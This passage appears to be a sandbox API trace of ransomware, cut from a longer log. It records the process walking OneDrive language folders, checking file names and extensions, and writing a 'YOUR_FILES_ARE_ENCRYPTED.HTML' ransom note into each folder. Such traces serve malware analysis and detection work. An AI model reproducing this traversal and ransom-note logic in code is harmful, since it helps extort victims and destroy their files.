lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr" [0161.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\*" [0161.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa799730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9fad30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9fad30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.552] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa799730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9fad30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9fad30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.552] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9fad30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9fad30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9fad30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.552] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.552] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.552] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.552] lstrlenW (lpString=".mui") returned 4 [0161.552] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.552] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9fad30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9fad30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9fad30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.552] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.552] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\hr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.553] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.555] CloseHandle (hObject=0x594) returned 1 [0161.556] GetProcessHeap () returned 0x270000 [0161.557] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.557] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9fad30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaabc3db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaabc3db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="hu", cAlternateFileName="")) returned 1 [0161.557] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu") returned 74 [0161.557] GetProcessHeap () returned 0x270000 [0161.557] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.557] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu" [0161.557] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\*" [0161.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9fad30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaabc3db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaabc3db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.567] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9fad30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaabc3db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaabc3db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.567] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaabc3db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaabc3db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaabc3db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.567] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.567] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.568] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.568] lstrlenW (lpString=".mui") returned 4 [0161.568] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.568] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaabc3db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaabc3db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaabc3db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.568] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.568] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\hu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.569] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.571] CloseHandle (hObject=0x594) returned 1 [0161.572] GetProcessHeap () returned 0x270000 [0161.572] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.573] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaabc3db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadd90f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadd90f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="hy", cAlternateFileName="")) returned 1 [0161.573] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy") returned 74 [0161.573] GetProcessHeap () returned 0x270000 [0161.573] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.573] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy" [0161.573] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\*" [0161.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaabc3db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadd90f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadd90f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.575] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaabc3db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadd90f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadd90f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.575] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadd90f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadd90f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadd90f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.575] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.575] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.575] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.575] lstrlenW (lpString=".mui") returned 4 [0161.575] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.575] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadd90f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadd90f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadd90f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.575] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.576] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\hy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.576] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.579] CloseHandle (hObject=0x594) returned 1 [0161.579] GetProcessHeap () returned 0x270000 [0161.580] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.580] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadd90f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaafee430, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaafee430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="id", cAlternateFileName="")) returned 1 [0161.580] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id") returned 74 [0161.580] GetProcessHeap () returned 0x270000 [0161.580] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.580] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id" [0161.580] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\*" [0161.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadd90f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaafee430, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaafee430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.582] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadd90f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaafee430, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaafee430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.582] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaafee430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaafee430, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaafee430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.582] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.582] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.582] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.582] lstrlenW (lpString=".mui") returned 4 [0161.583] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.583] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaafee430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaafee430, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaafee430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.583] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.583] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\id\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.583] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.586] CloseHandle (hObject=0x594) returned 1 [0161.586] GetProcessHeap () returned 0x270000 [0161.587] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.587] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaafee430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab191350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab191350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ig-ng", cAlternateFileName="")) returned 1 [0161.587] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng") returned 77 [0161.587] GetProcessHeap () returned 0x270000 [0161.587] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.587] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng" [0161.588] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\*" [0161.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaafee430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab191350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab191350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.588] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaafee430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab191350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab191350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.588] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, 